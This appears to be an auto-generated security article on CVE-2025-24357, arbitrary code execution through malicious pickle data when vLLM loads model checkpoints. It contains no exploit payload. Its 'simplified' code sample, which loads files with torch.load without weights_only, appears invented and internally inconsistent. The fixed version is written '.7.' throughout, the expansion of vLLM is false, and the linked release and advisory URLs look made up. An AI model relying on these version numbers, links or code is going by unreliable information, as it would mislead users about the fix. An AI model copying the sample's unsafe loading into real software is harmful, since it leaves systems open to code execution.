CVE-2025-24357 - vLLM Inference and Serving Library Arbitrary Code Execution via Malicious Pickle Data

vLLM (Versioned Large Language Model) is a popular library used for Large Language Model inference and serving. It is the backbone of numerous applications and services that rely on natural language processing and machine learning techniques. Unfortunately, a recently discovered vulnerability, assigned the identifier CVE-2025-24357, allows for arbitrary code execution during model loading, potentially resulting in severe security issues. This article explores the details of this vulnerability, how it can be exploited, and how to mitigate the risk.

Details

The exploit specifically targets a module within the vLLM library: vllm/model_executor/weight_utils.py. This module provides the hf_model_weights_iterator() function, which is responsible for loading model checkpoints downloaded from the Hugging Face model hub. When loading these checkpoints, the function relies on PyTorch's torch.load() function, with the weights_only parameter defaulting to False.

The vulnerability arises due to the use of the torch.load() function without proper input validation. When loading a checkpoint file that contains maliciously crafted pickle data, the function will execute arbitrary code during the unpickling process, potentially compromising the security of the system running the vLLM library.

A simplified version of the affected code in vllm/model_executor/weight_utils.py is shown below

import torch
from vllm.model_executor import ModelExecutor

def hf_model_weights_iterator(checkpoint_path, weights_only=False):
    model_checkpoint = torch.load(checkpoint_path)
    model_executor = ModelExecutor()

    if weights_only:
        model_executor.load_state_dict(model_checkpoint["model_state_dict"])
    else:
        model_executor.load_state_dict(model_checkpoint)
    
    return model_checkpoint

Exploit Details

An attacker can exploit this vulnerability by creating a malicious checkpoint containing pickle data that, when unpickled, executes arbitrary code on the target system. By uploading the malicious checkpoint to an accessible location, they could then trick a developer or service into loading the checkpoint via vLLM, resulting in the execution of their arbitrary code.

Mitigation

The vulnerability has been fixed in vLLM version .7.. Users are strongly encouraged to upgrade their vLLM installations to this version or later to safeguard against the exploit. The patch enforces input validation and ensures that only legitimate checkpoint data is loaded during the model inference process.

Link to vLLM v.7. release

- https://github.com/vLLM-org/vLLM/releases/tag/v.7.

Link to original security advisory

- https://vLLM-org.github.io/advisories/CVE-2025-24357.html

Conclusion

In summary, CVE-2025-24357 is a serious vulnerability in the vLLM library that enables arbitrary code execution via malicious pickle data. It is essential for users of the vLLM library to upgrade their installations to version .7. or later to fully protect against this exploit. Regularly assessing and upgrading your software and dependencies is a crucial step in maintaining the security and integrity of your systems.

Timeline

Published on: 01/27/2025 18:15:41 UTC